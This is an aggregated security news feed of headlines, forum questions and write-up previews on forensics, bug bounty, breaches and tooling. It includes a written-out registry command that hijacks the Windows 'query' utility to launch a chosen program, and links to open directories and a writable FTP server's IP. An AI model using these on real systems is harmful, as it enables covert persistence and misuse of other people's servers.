    [Reader Perk] The FreeBuf editors are out sick, so "development" has to step in
    Come claim your perks: tens of thousands of GB of learning materials and a rabbit are waiting for you~
    FreeBuf Morning Report | Toyota's India subsidiary suffers a data breach; Firefox misidentified as IE and blocked
    According to foreign media reports, Toyota's Indian subsidiary (Toyota Kirloskar Motor) said on January 1 that a data breach at the company may have exposed some customers' personal information.
    Polish security agency warns it will face all-round, multi-pronged cyberattacks from pro-Russian hackers
    Since the Russia-Ukraine conflict began, Poland has been a target of cyberattacks by pro-Russian hackers. These attacks have targeted almost every kind of Polish entity, including government departments, private organizations, and media outlets.
    Google agrees to pay $29.5 million to settle two lawsuits over tracking user location data
    Google has agreed to pay a total of $29.5 million to settle two lawsuits related to tracking user location.
    LockBit actually apologized! And released a decryptor for the victim
    LockBit announced an apology for the attack on SickKids, a children's hospital in Toronto, and gave the victim a free decryptor to decrypt the encrypted files.

    Creating Darkweb Crawler using Python and Tor
    In this blog, we will look at a Python script that can be used to crawl the darkweb, and we will discuss the advantages and benefits of… Continue reading on InfoSec Write-ups »
    Golang Programming and Security Vulnerabilities
    No content preview
    Exploring the World of ESI Injection
    No content preview

    State of the Subreddit #5
Hello everyone and happy New Year! It's been a few months since the last one of these, but the sub has been running well so we've seen no need for a new one till now. Banner: We are in an active search for a new subreddit banner; if you'd like to submit one, please feel free to comment your submission. Guidelines for the banner are as follows: https://mods.reddithelp.com/hc/en-us/articles/360010112892-Banner Small banners: 1920×128 pixels, aspect ratio of 15:1. Medium banners: 1920×256 pixels, aspect ratio of 7.5:1. Large banners: 1920×384 pixels, aspect ratio of 5:1. Discord: We have been considering a community Discord for a while now where members can help one another with active career questions, support, and much more. It's been decided to leave the creation of it up to what you all think. Please vote; the poll will be up for 7 days. Have a wonderful New Year! - r/AskNetsec Mod Team. submitted by /u/-Vampires-
    Are iOS notes "protected" by fingerprint safe?
    Hello, in iOS, I can "protect" my notes with a password and with Face ID or my fingerprint, but is it really safe? submitted by /u/hthouzard
    A desperate cry for MacOS X forensic tools
Seriously, what's wrong with it? If you look for toolsets, everything is pretty straightforward on Windows, slightly less on Linux, but there is plenty of information, and MacOS X.. seems to be.. cursed? Everything starts with the acquisition phase. It must be simple, right? You need three images: a byte-accurate disk dump, a decrypted disk dump suitable for analysis detachable from the T2 chip, and a memory dump. NO. Every tool out there is either 10 years old and does not work on modern MacOS, or is designed for LEAs and other entities who have forensic investigations as a core business or at least someone's day job. With a corresponding price tag attached. Every article out there is either hopelessly outdated or incomplete, or it is SEO-facelifted copyrighted 10-year-old content, or suggests silly things like using rsync for forensic imaging. If you look into the Volatility framework manual, it explicitly says: "Volatility does not provide the ability to acquire memory. We recommend using Mac Memory Reader from ATC-NY, Mac Memoryze, or OSXPmem for this purpose. Remember to check the list of supported OS versions for each tool before using them." Guess what? None of these tools work today. Not a single one. It does not get any better on the next stages. Say, all information on hunting sleeping Cobalt Strike beacons is heavily Windows-centric. upd: those who downvote, care to elaborate in comments? submitted by /u/arkenoi
    Password managers for enterprise
I've recently been tasked with finding new password management solutions for our company after the LastPass security breach. Personally, I use Bitwarden and have had a good experience with it. The question now is whether we should go with the Bitwarden cloud service or host our own Bitwarden instance in Azure. As a company of around 100 employees, security is a top priority for us. Both options have their benefits, but I wanted to get some opinions from others who may have more experience with these types of decisions. One potential advantage of self-hosting is that we have the ability to monitor and set up alarms for detection, which could be beneficial for security purposes. What are your thoughts on the Bitwarden cloud vs self-hosted options? Are there any other password management solutions that you would recommend for a company of our size? submitted by /u/PapiPoseidon
    Reasonably priced /Free DFIR Training
Hi Everyone, Hope you are well. I'm a first time poster so apologies if this is a noob question. I am currently working in a SOC and I was looking to transition into either a digital forensics or an IR role. I really wasn't sure about what learning or training courses I should be taking to get my foot in the door here. I was in the process of completing the BTL1 exam and am working on TryHackMe but they seem quite simple. I looked into the SANS GIAC courses but they seem excessively expensive. Are there any other resources / structured training courses which I can work towards to move towards this role? Thanks and apologies in advance if I haven't followed any of the moderators' rules. submitted by /u/Leather-Marsupial256
    Using anonaddy, simple login or similar services with own domain
What do you think about using your own domain through anonaddy or similar services? I use this as a catchall with service@domain.com for various accounts (shops etc.). For me the pro is the administration: I can easily deactivate aliases if I want. The biggest downside is that it creates an additional middleman on the way to my email provider. Do you think this is a big security issue? submitted by /u/cake52
    Phishing email from knowbe4
Happy New Year!! So I am a security analyst and I was going through our reported phishing emails and I see that KnowBe4 is using one of our legitimate emails to send phishing (humanresources@company.com). In my opinion this defies the purpose of phishing unless the domain can be spoofed, which is another topic altogether. Am I correct about this? submitted by /u/hannibal_the_general
    How does ChatGPT work?
The release of ChatGPT, an AIGC model, has caused a stir in the tech industry and has become one of the most exciting developments of 2022. This breakthrough reaffirms our belief in the potential of AI to revolutionize a variety of industries, including security. How does ChatGPT work? This blog summarized relevant AIGC technology and showed how it has progressed over the years. How does ChatGPT work? Tracing the evolution of AIGC. submitted by /u/Calm_Scene
    Crowdstrike Falcon
So I just noticed that my school offers CrowdStrike Falcon to students on our personal computers for free. Is it worth downloading? Currently I just use Windows Defender, plus an occasional Malwarebytes scan. submitted by /u/te91fadf24f78c08c081

    Cloud Metadata - AWS IAM Credential Abuse
submitted by /u/SNEAKYMONK3Y
    GitHub - kitabisa/teler-waf: teler-waf is a Go HTTP middleware that provide teler IDS functionality with teler IDS to protect against web-based attacks and improve the security of Go-based web applications. It is highly configurable and easy to integrate into existing Go applications.
submitted by /u/dwisiswant0

    VHL 10.1x.1.160 — Core
    Virtual Hacking Labs Advanced box. Scan results below. Continue reading on Medium »
    VHL 10.1x.1.83 — John
    Beginner Box. This one is too easy. We’ll start with the scan. Continue reading on Medium »
    VHL 10.1x.1.2 — Lucky V2
    Another Virtual Hacking Labs Advanced box. Scan results below: Continue reading on Medium »

    if for nothing else - use this link and watch BULLETTRAIN!!
http://51.15.7.117/AFLAM/E/ submitted by /u/LucasImages
    Open Ftp With write access
142.186.48.74 submitted by /u/u178x
    Tv shows
http://dl.gemescape.com/Series/ If you're looking for Star Trek The Next Generation: http://188.210.209.2/EDI/Tv%20Shows/Star%20Trek%20The%20Next%20Generation/ submitted by /u/Waste-Release-6235
    A few movies
http://www.landhanoitours.com:82/plex/720P_Vie/ Also some cartoons in parent directory. submitted by /u/Waste-Release-6235
    Some software
http://pub.agrarix.net/Windows/ submitted by /u/Waste-Release-6235
    Some nice wallpaper for your desktop
http://7-themes.com/data_images/collection/1/ https://otlibrary.com/wp-content/gallery/wallpapers/ submitted by /u/Waste-Release-6235

    Imaging a 4 Bay Synology BTRFS SHR Raid Type
I know enough about Synology / DSM to at least cause some trouble since I have one I use personally. Need to image a 4 Bay Synology next week. Plan on doing a logical collection but also plan on pulling each drive and imaging separately too. We should have cooperation for any admin credentials etc. I do have some concerns about the unit that I will need to check while on-site. Please share any tips for handling. Can X-Ways rebuild this RAID type? Will need to check if our license is still valid for the copy. What if data replication or snapshots are enabled via Snapshot Replication / Hyper Backup / Rsync? Recycle bin enabled on certain shares? Mail being hosted via Synology Mail Plus Server: can it be exported in PST format for eDiscovery purposes, or would we have to acquire the mailboxes via an email collection tool such as FEC? Any other tips or gotchas we should look out for when examining / capturing the unit? Thanks in advance. submitted by /u/no_sushi_4_u
    The Windows Process Journey — audiodg.exe (Windows Audio Device Graph Isolation)
submitted by /u/boutnaru

    Simple SQL Injection
SQL injection is a very critical vulnerability for any organization. An attacker can get hold of internal data through an SQL dump. Continue reading on Medium »
    Web-Cache Poisoning $$$? Worth it?
    In this article, I will try to guide the readers about a bug that is easy to miss and doesn’t get a lot of attention, but surely it’s… Continue reading on Medium »
    Vulnerability Assessment & Penetration Testing [VAPT]
    VAPT (Vulnerability Assessment and Penetration Testing) is a process that involves identifying and evaluating vulnerabilities in a system… Continue reading on Medium »
    My Learning Journey
    Hello everyone, My name is Yaseen and I am a software engineer with a passion for ethical hacking. I have decided to document my findings… Continue reading on Medium »
    An amazing way to turn a xss into an ATO
    In this write-up, I will discuss a bug that both myself and Flag_c0 discovered in a program. Without further delay, let’s get into it… Continue reading on Medium »
    Automated and Continuous Recon/Attack Surface Management — Amass Track and DB
    Not using Continuous Attack Surface Management is the reason you keep getting dupes, let’s talk about it… Continue reading on Medium »
    India’s Aadhar card source code disclosure via exposed .svn/wc.db
    Hi Guys, I recently found a .svn/wc.db folder exposed on a resident.uidai.gov.in, and used it to reconstruct the Web app’s source code. I… Continue reading on Medium »
    ChatGPT — Bug Bounty Recon Automation
    Well, in recent weeks ChatGPT has been the buzz. For those who don’t know what ChatGPT is? I am sorry to say that, you are far behind the… Continue reading on Medium »
    The three main types of XSS
    Continue reading on Medium »
    How I Got My First Reflected XSS Bug Bounty!
It was way back in 2016 and I was new to this bug bounty thing; a lot has changed since then. Continue reading on Medium »
    How to get and handle malware
    Hello guys! In this blog I would like to share some things I learned, this is very important as malware analysis is risky by nature. Continue reading on Medium »

    DROPS - Adversary Tool Command Generator / "Dynamic Cheat Sheet"
submitted by /u/Trop_Chaud
    Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists for expedited initial access and lateral movement
    Offensive Software Exploitation (OSE) Course
submitted by /u/dmchell
    Rust reflective loader
submitted by /u/dmchell
    Automating cobalt strike profile generation with Jenkins
submitted by /u/XRomRII
    Reflective DLL Injection explained
submitted by /u/Alternative_Art8728

    SecWiki News 2023-01-02 Review
2022 Space Security Report by ourren; Real-time fault localization by ourren. For more of the latest articles, visit SecWiki.

    ReDoS (Rails::Html::PermitScrubber.scrub_attribute)
    Ruby on Rails disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1684163
    Address Bar Spoofing on TOR Browser
    Tor disclosed a bug submitted by soulhunter: https://hackerone.com/reports/275960

IW Weekly #40: Open Redirection Vulnerability, Misconfigured Jira, Bugs in Red Bull, ChatGPT…
    No content preview
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    No content preview

    OSINT — Cold War Enemies
    This article is my solution to the CTF challenge titled Cold War Enemies, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT — Road To Nowhere
    This article is my solution to the CTF challenge titled Road To Nowhere, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT — On The Wire
    This article is my solution to the CTF challenge titled On The Wire, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    OSINT — The Spy Who Vanished
    This article is my solution to the CTF challenge titled The Spy Who Vanished, an Open Source Intelligence (OSINT) challenge available on… Continue reading on Medium »
    Email Analysis — Tips & Resources
    Tips and resources on how to have a better understanding of phishing attacks using email messages. Continue reading on Medium »

    OFRAK: a powerful source code analysis and modification platform
    OFRAK stands for Open Firmware Reverse Analysis Konsole; the tool is a powerful source code analysis and modification platform.
    FreeBuf Morning Report | Google to pay nearly $30 million to settle location tracking; Canadian mining company shuts down after attack
    Google has agreed to pay a total of $29.5 million to settle two separate lawsuits brought by Indiana and Washington, D.C. over its "deceptive" location tracking practices.
    FreeBuf Morning Report | Google to pay $29.5 million in lawsuit settlements; Canadian mining company shuts down after attack
    Global news 1. LockBit cracked! Japanese police have helped 3 companies recover their data. According to Japanese media, Japan's National Police Agency has successfully decrypted files encrypted by the LockBit ransomware group, helping at least 3 companies recover their data without paying a ransom. [Read original] 2. Ransomware gang clones victims' websites to leak stolen data. ALPHV ransomware operators have gotten creative with their extortion tactics, in at least one case creating a replica of a victim's website to publish the stolen data on. [Foreign press - Read original] 3. US Louisian…
    Aftermath: a free and open-source incident response framework for macOS
    Aftermath is an incident response framework for macOS; the tool is developed in Swift and is a completely free and open-source cybersecurity incident response framework.


    Fuzzing Random Ubuntu Packages with Mayhem — Part 1
    About Mayhem Continue reading on Medium »

    VHL 10.1x.1.36 — Steven
    Another VHL beginner box. Scan results below. Continue reading on Medium »

    Are elusive vulnerabilities still relevant?
    By elusive here I am speaking about exploits like request smuggling, cache deception, cache poisoning, JSON interoperability (https://bishopfox.com/blog/json-interoperability-vulnerabilities). I have read a couple of articles on PortSwigger that said these vulnerabilities are on the top list in 2022, and many researchers have spoken about them, yet when I search for reports on them on HackerOne, the recent ones are from 2-3 years ago. I know that bug hunting and penetration testing are different, but if an application has been tested for the normal and popular exploits (XSS, SQL injection, etc.) I feel that not many people would test the elusive vulnerabilities, which means they might be present. submitted by /u/Ramseesthe4th
    If I don't encrypt my Gmail I'm dumb?
I was watching a CompTIA course and the instructor was speaking about the different certifications and how they can improve our daily emails. Also, he said we can encrypt our regular email from Yahoo or Gmail. What benefits can I have from encrypting my Gmail account? Would it only be more privacy for my inbox, or something else? What setup do you recommend I install on my Gmail? submitted by /u/MrNoodlesLearns

    My report on how the admin panel took over and I got X, $500 bounty from my report
    Hello hackers, Description: Continue reading on Medium »
    $500 in 5 minutes
    Extremely easy bug to find with good bounties. Continue reading on Medium »
    Hunt XSS easily
Hi, everyone. XSS is a common bug that is found across all the platforms. The easiest way to do that is to use an automation tool. For… Continue reading on Medium »
    Learning Web-Sec - Day 6 - PortSwigger SQL Injection Labs
    Blind SQL Injection with Time Delays Continue reading on Medium »
    How I Design My Perfect Bug Bounty Automation (3)
    In this article I will tell you what I think is the perfect Bug Bounty automation architecture. It doesn’t require you to code much, only takes… Continue reading on Medium »
    Ways to Exploit Cross site leaks
    What is Cross Site Leaks Vulnerability? Continue reading on Medium »

    Basics of OSINT Essay
    Introduction Continue reading on Medium »
    End Of The Year UDOM CTF 2022
    Just a few hours before “cd year-2023” or “sudo apt install year-2023” if you’d prefer, I participated in an awesome CTF competition… Continue reading on Medium »
    SPY NEWS: 2022 — Week 52
    Summary of the espionage-related news stories for the Week 51 (December 25–31) of 2022. Continue reading on Medium »

    Exploiting Unpatched Vulnerability in TP-Link WR940N V6 Router
    Article URL: https://github.com/b1ack0wl/vulnerability-write-ups/blob/master/TP-Link/WR940N/112022/Part1.md Comments URL: https://news.ycombinator.com/item?id=34209363 Points: 2 # Comments: 0

    SecWiki News 2023-01-01 Review
Cloud-Native Security Series (2) | Lateral movement to the master node using K8s taint tolerations by tinyfisher; SLEUTH: real-time attack scenario reconstruction from COTS audit data by ourren. For more of the latest articles, visit SecWiki.

    GitHub - jafarlihi/modreveal: Utility to find hidden Linux kernel modules
submitted by /u/jafarlihi
    Compromised PyTorch-nightly dependency chain
submitted by /u/z84

    Netscape screensavers
https://ftp.mizar.org/pub/www/netscape/screensavers/english/ submitted by /u/Waste-Release-6235
    Electrolytic Capacitor manuals
http://www.paullinebarger.net/DS/ submitted by /u/Waste-Release-6235

    Investigating Sensitive Files Theft | Registry Forensics | TryHackMe Secret Recipe
submitted by /u/MotasemHa

    Java Code Audit: A Complete Guide to SQL Injection
    1. Introduction to basic theory. 1.1. Database types. Databases are now quite common, and many enterprises use them to manage and store data. The common classification divides databases into relational and non-relational databases; a relational database is one that uses the relational model to organize its data, which simply put…
    A Python backdoor implanted in VMware ESXi
    In October 2022, researchers discovered a backdoor implanted in VMware ESXi servers.
    Supply chain attack targeting the trading software TradingView
    Recently, researchers found attackers distributing the ArkeiStealer information-stealing malware disguised as a Windows installer for a trading application.


    Persistence and LOLBins
    Grzegorz/@0gtweet tweeted something recently that I thought was fascinating, suggesting that a Registry modification might be considered an LOLBin. What he shared was pretty interesting, so I tried it out. First, the Registry modification: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\Utilities\query" /v LOLBin /t REG_MULTI_SZ /d 0\01\0LOLBin\0calc.exe Then the command to launch calc.exe: query LOLBin Now, I've tried this on a Windows 10 system and it works great, even though Terminal Services isn't actually running on this system. Running just the "query" command on both Windows 10 and Windows 11 systems (neither with Terminal Services running) results in the same output on both: C:\Users\harlan>query Invalid parameter(s) QUERY { PROCESS | SESSION | TERMSERVER | USER } Ru…
    Keeping Grounded
As 2022 comes to a close, I reflect back over the past year, and the previous years that have gone before. I know we find it fascinating to hear "experts" make predictions for the future, but I tend to believe that there's more value in reflecting on and learning from the past. Years ago, I remember hearing about something in legal circles referred to as "the CSI effect". In short, the unrealistic portrayal of "forensics" on TV shows had influenced public opinion. People would watch an hour-long crime drama TV show, and what they saw set the expectation in their minds of what "forensics" should be, and this unrealistic expectation made it difficult for prosecutors to convince some juries of their evidence. Over the holiday season, a "bomb cyclone" across the US combined with the numbers of folks…

    Military Intelligence 101: A Beginner’s Guide to Understanding and Using It
    Continue reading on Medium »
    Tryhackme Advent of Cyber Day 3
    Another day, Another challenge. This one is based off OSINT (Open Source Intelligence). Continue reading on Medium »

    Advanced Persistent Threats and why regular pentesting is not enough
    Advanced persistent threats (APTs) are targeted, sophisticated cyberattacks whose goal is to infiltrate a… Continue reading on Medium »

    French Porn, Movies, Documentaries. Repost ish (2 years old) uploaded 2022 dates and Slow 600K/s
PD is just a text reply (the 2 year old post); this is a Dir that is open. https://multi-1.w1p.fr/monq_glenn_hughes/ and the beauty of the Internet: The_A-Team_XXX_A_Parody.mp4 repost ish from: https://www.reddit.com/r/opendirectories/comments/laozv8/od_with_some_old_user_free_websites_i_think_some/ submitted by /u/thats_dumberst
    Random images
https://tomthefanboy.com/misc/ submitted by /u/Waste-Release-6235
    Cybersecurity books from humble bundle
submitted by /u/SnooSketches2164

    RECON FOR BUG BOUNTY- Tool Part1
Reconnaissance plays a very important role in any security audit or bug bounty program. In this article we will see how DIRB can be used… Continue reading on Medium »
    Learning Web-Sec - Day 5 - PortSwigger Blind SQL Injection Labs
    Blind SQL Injection with Conditional Errors Continue reading on System Weakness »
    Learning Web-Sec - Day 5 - PortSwigger Blind SQL Injection Labs
    Blind SQL Injection with Conditional Errors Continue reading on Medium »
    Navigating the World of Directory Traversal
    Are you tired of being hacked left and right? Fear not, dear reader! Today, we’re talking about directory traversal, a sneaky little… Continue reading on Medium »
    Hacking Bigbasket Ethically For Free Groceries
    Who doesn’t love free groceries? In this write-up, I will be discussing a cart tampering vulnerability that I discovered in the popular… Continue reading on Medium »
    My cybersecurity goals for 2023!
    I am thinking of trying some bug bounty from HackerOne this year. It will be my priority in 2023 alongside @hackthebox_eu. I think it will… Continue reading on Medium »
    ‘PTN’ infosec monthly #7 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    Cybersecurity: Trends from 2022 & Forecasts for 2023
    Cyberattacks grabbed headlines throughout 2022, and 2023 seems to be just as damaging. Cybercriminals’ techniques are evolving, and they… Continue reading on Bug Zero »
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of… Continue reading on InfoSec Write-ups »

    What to know before starting browser exploitation?
Hello, for now I'm studying web hacking with "Bug Bounty Bootcamp" by Vickie Li. When I finish the book, I will return to studying binary exploitation; in particular I will start browser exploitation. What do I have to know before I can start browser exploitation? I know the basics of web development (HTML, CSS, JS, PHP, SQL), C, Python, Java and some assembly (x86 and x64). submitted by /u/wlo1337

    Antique HackTheBox Walkthrough
Summary: Antique is a Linux machine and is considered an easy box by Hack The Box. On this box, we will begin with a basic

    SecWiki News 2022-12-31 Review
MOSAICS: an extended situational awareness framework for industrial control systems by ourren; Open-CyKG: an open cyber threat knowledge graph by ourren. For more of the latest articles, visit SecWiki.

    LuaJIT Sandbox Escape: The Saga Ends
submitted by /u/Gallus

    What's the average salary for a network security engineer with 2 years of experience in your country?
    What's the average salary for a network security engineer with 2 years of experience in your country? submitted by /u/AdDifficult1588
    When do we stop reporting on CSRF issues?
I've noticed for a while that PoCs for CSRF vulnerabilities, due to browsers implementing SameSite cookies by default, are more and more infeasible. I've been a strong defender of "not everyone has a modern browser", but we're moving to a point where older browsers already aren't working (i.e., 'fetch' and 'const'). What's your take on when we cross this off as a threat? submitted by /u/disclosure5
    How do you retrieve (decrypt) a payload from a LoRa Chirpstack downlink frame at an edge device?
What is an efficient recipe for extracting a payload from a downlink frame at an edge device? Below are three contiguous frames generated by Chirpstack that have arrived at my edge device. Spaces have been added for visual effect. Note that the sizes are correct among them in terms of bytes. This will involve some AES decryption with a final XOR. Only parts of these frames are encrypted. But how would I perform the XOR on a variable-length payload? (1) 600b0b0b 009f c825 03000100700330ffff01050868e28c 01187f7ffa ad1af8 (2) 600b0b0b 008f c925 03000100700330ffff01050868e28c 01ad9eb655 316b42 052d7e (3) 600b0b0b 008f ca25 03000100700330ffff01050868e28c d5248606 600b0b0b is my device address with a network-derived code inserted in the first byte. c825, c925, ca25 are the frame counters incrementing on each frame (little endian). Note, again, those bytes are not encrypted. (1) contains the payload FADE93 (2) contains the payload FADE93FADE93 (3) contains an empty payload. So how do I get them out of the frames? submitted by /u/vwibrasivat

    A first look at brute-forcing with website CAPTCHA recognition based on the ddddocr library
    Preface: In routine brute-force work, when a website's CAPTCHA cannot be bypassed, automatic CAPTCHA recognition is needed to assist the brute-forcing. This article discusses the most common 4-character CAPTCHA combining digits and letters; the experimental environment used is Python's ddddoc…
    The fun Hack-A-Sat satellite hacking competition: satellite mission planning
    This article describes the solution process for the satellite mission planning challenge, Mission, in the Hack-A-Sat satellite hacking competition.

    Analysis of the Confucius APT group's cyberattack against Pakistan's IBO counter-terrorism operation – NSFOCUS Technical Blog
    submitted by /u/dmchell

    Fuzzing smart contracts
Fuzzing smart contracts on the Ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Coinmonks »
    Fuzzing smart contracts
Fuzzing smart contracts on the Ethereum blockchain is becoming hybrid: combining tools is allowing fuzzing to cover more code paths and find… Continue reading on Medium »

    BitLocker RAM dump attack
    Hey guys, I'm quite new to computer forensics. I tried to open a BitLocker encrypted drive by extracting the key from a memory dump, but the tools I used didn't find anything. My understanding is that the BitLocker full encryption key leaks into the RAM when the computer boots. Is this only true when the disk had been encrypted and/or has already been unlocked on the target computer, or does this happen on every computer? For example, if I have a BitLocker encrypted drive and I mount it to my computer, but obviously I can't unlock it without the password, can I extract the key from my own computer? submitted by /u/zsigmons

    Guests can continue to receive video streams from call after being removed from a conversation
    Nextcloud disclosed a bug submitted by daniel_calvino_sanchez: https://hackerone.com/reports/1706248
    No password length limit when creating a user as an administrator
    Nextcloud disclosed a bug submitted by hackeronefour: https://hackerone.com/reports/1727424
    Disabled download shares still allow download through preview images
    Nextcloud disclosed a bug submitted by juliushaertl: https://hackerone.com/reports/1745766


    Secure medium for data transfer in and out of air-gapped systems
    I am separating my communication and cryptography systems (an offline system on which the encryption and decryption takes place, like an HSM). No threat at that level, it's just a fun exercise! The cryptography system will not be connected to any network. I am looking for a medium to transfer data in and out of the air-gapped system securely. The medium can be configured as read-only storage, has minimal firmware (something like the open-source coreboot, but for storage), or a firmware signed by a trusted party with a verifiable signature. This way, it's harder for the compromised communication system to infect the USB with malware that propagates to the encryption system. The medium should support, say, 1TB (so optical disks are not very useful, since they are limited in capacity to tens of GBs). What's the best tool for this purpose? Modern SSDs/HDDs come with complex proprietary firmware (almost like an operating system) and controllers. I am not looking for fancy one-way diodes or similar; that is impractical. submitted by /u/chaplin2 [link] [comments]
    Custom Detection For Ducklogs Malware
    I'm trying to build a Defender custom detection query with KQL. I've written a query based on hashes and file names, but we know that these can easily change. I wanted to build the detection based on behavior instead of hashes and filenames. One aspect of behavior is that the Ducklogs malware "uses the steganography technique to hide malicious content in the compressed bitmap image." I figured basing the detection on a bitmap image being decompressed would be a good place to start, but there may be better/more reliable aspects of the malware's behavior to build the detection on. So I have two questions: Does anyone know what service/process Windows would use for decompressing a bitmap image? (Since I'm new to cyber) How would I find this information in future? I tried using procmon while decompressing my own bitmap image, but nothing yet. Thank you. submitted by /u/Guitarware [link] [comments]
    How to get a handle on AWS security, multiple accounts, don't know AWS well
    I have been doing IT for like 20 years, currently in an information security role. I am comfortable with on-premises stuff, some Azure, but AWS feels so foreign and complicated. I feel like this is an area I need to get better at to secure our environment, but I'm not really sure where to start. I don't want to go watch random YouTube videos; I feel like I need some starting point and a track to follow? submitted by /u/junkaccount1999 [link] [comments]
    What do you use for developer secure coding training?
    Most of them have an MSDN; not sure if there is anything free that is good in there. We have KnowBe4, but it isn't great beyond security awareness training. Spoke with Veracode as an option, but do you have any recommendations? submitted by /u/junkaccount1999 [link] [comments]
    How to prepare for the Crest CPSA?
    Hello everyone, I intend to take the Crest CPSA soon but don't know how to prepare because there isn't much information available online. I bought O'Reilly's Network Security Assessment book; should I study and check off the topics on the syllabus? Thank you, Joseph submitted by /u/Josephzhang [link] [comments]
    Regarding remote jobs
    I have experience in WAPT and appsec and wanted to know whether there are any opportunities for a remote job, internship, or paid project. I have searched many companies and applied to them, but many of them demand OSCP or SANS certs and on-site work, which are not budget-friendly for me. Besides, I love to collaborate and want to learn. Basically I need an entry-level job that is remote. Your help would be really appreciated :) submitted by /u/Vijay-Vidhrohi [link] [comments]
    Chatgpt for vulnerability discovery
    ChatGPT can actually detect vulnerabilities in the code if you give it a piece of text. Do you think it can possibly replace SAST tools (SonarQube, CodeQL, Semgrep, Snyk, etc.), as you can use ChatGPT or its APIs to find vulnerabilities while the developer team is working on code? submitted by /u/Calm_Scene [link] [comments]
  • Open

    How can I get practical experience?
    I've recently become interested in pursuing a career in computer forensics. I've got a programming background (proficient with Python for data analysis) and currently work as an analyst for a software company. So, I'm very comfortable with IT stuff in general. I'm having trouble figuring out how to get practical experience for digital forensics. If I wanted to get good at woodworking, I would buy wood, buy tools, and create something with it. But that same path for this type of forensics is not obvious to me. People aren't exactly releasing disk images full of financial transactions for people like me to analyze. So, how is someone supposed to find data to get practical experience with? submitted by /u/Megacannon88 [link] [comments]
  • Open

    GCPGoat(ine) GCP CTF solution Module 1-Scenario 2
    Hi readers, here we will be solving the GCPGoat module 1(Path 2). Continue reading on Medium »
    Introduction to PowerSploit: A Collection of PowerShell Tools for Penetration Testing and Red…
    PowerSploit is a collection of PowerShell scripts and tools that are designed to assist with penetration testing and red teaming… Continue reading on Medium »
  • Open

    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on Medium »
    Learning Web-Sec - Day 4 - PortSwigger SQL Injection Labs
    Blind SQL Injection. Continue reading on System Weakness »
    Learning Web-Sec - Day 4 - PortSwigger SQL Injection Labs
    Blind SQL Injection. Continue reading on Medium »
    Renewing Composable’s Bug Bounty Program for Picasso via Immunefi
    As a part of our ongoing commitment to security, we are proud to announce the renewal of our bug bounty program with Immunefi Continue reading on Medium »
    CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building
    Introduction: Continue reading on Medium »
    Bug Zero at a Glance [Week 24–30 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs)
    A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and… Continue reading on Medium »
    Setting up your bug bounty scripts with Python and Bash
    How to set up python and bash scripts for bug bounty automation for powerful automation? Thought about this ever? Read this article to… Continue reading on InfoSec Write-ups »
    How I Design My Perfect Bug Bounty Automation (2)
    So, let's follow on from the previous article. Continue reading on Medium »
    Get an Edge with ChatGPT: 10 Ways It Can Benefit Smart Contract Auditors and Bug Bounty Hunters
    ChatGPT Continue reading on Medium »
    Difficulty of Reproducing Old Exploits (Part Two)
    In Part One, I described my journey to try to reproduce the Fei protocol exploit, following an article by Lucash-dev written for Immunefi. Continue reading on Medium »
  • Open

    Greta Thunberg Takes Down Andrew Tate With 1 Tweet — OpSec Fails
    Continue reading on Medium »
    Attack Surface Reduction for Information Security
    The attack surface comprises all the areas through which an adversary can attempt to breach and exploit a system. For… Continue reading on Medium »
    PAI Research Process, part 4
    When you are confident you can adequately address the research topic, you should begin the process to develop the final product for your… Continue reading on Medium »
  • Open

    Architecture Notes - Capture the Flag.
    submitted by /u/myusuf3 [link] [comments]
    Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463
    submitted by /u/Gallus [link] [comments]
    There is no secure software supply-chain.
    submitted by /u/dlorenc [link] [comments]
    Reverse Prompt Engineering - Pwning the source prompts of Notion AI & 7 techniques for Reverse Prompt Engineering
    submitted by /u/Gallus [link] [comments]
    Mosca SAST tool
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Dom-Based XSS on parameter ?vsid=
    JetBlue disclosed a bug submitted by dracoludio: https://hackerone.com/reports/1452149
  • Open

    SecWiki News 2022-12-30 Review
    Ysomap: a Java deserialization exploitation framework adapted to all kinds of real-world complex environments by ourren; TABBY: a static code analysis tool for Java by ourren. For more recent articles, visit SecWiki
  • Open

    Old software and other stuff
    http://vtda.org/bits/ submitted by /u/Waste-Release-6235 [link] [comments]
    Lots of NES roms
    http://www.museo8bits.es/nes/ROMS/TODAS%20-%2010783%20ROMS/ submitted by /u/Waste-Release-6235 [link] [comments]
    Enter The Megadrive / video
    Some videos, tutorials and other swag ! megadrive megadrive2 submitted by /u/Arch-Enemy [link] [comments]
  • Open

    OSINT Case Study: Validating a website if its fraud or legit
    No content preview
    Infiltration in local network with Raspberry Pi (creating tunnel)
    No content preview
    Setting up your bug bounty scripts with Python and Bash
    No content preview
    RPS — Binary Exploitation Challenge Writeup | PicoCTF 2022
    No content preview
  • Open

    At the 2022 JD Jingqi (京麒) Cybersecurity Conference, I saw JD Security's new landscape
    From December 29 to 30, JD Group, together with several ecosystem community partners, held the 2022 Jingqi Cybersecurity Conference under the theme "New Landscape, New Concepts, New Security".
    FreeBuf Weekly | After Musk laid off 75% of staff, Twitter suffers a global outage; attackers steal and sell 400 million Twitter records
    This article summarizes the week's hot news, security incidents, good reads and handy tools, so you don't miss any of the week's highlights!
    Hackers can eavesdrop on user conversations! Security flaw found in Google Home speakers
    A security vulnerability in Google Home smart speakers lets an attacker install a backdoor account and remotely control the speaker.
    LockBit cracked! Japanese police have helped 3 companies recover their data
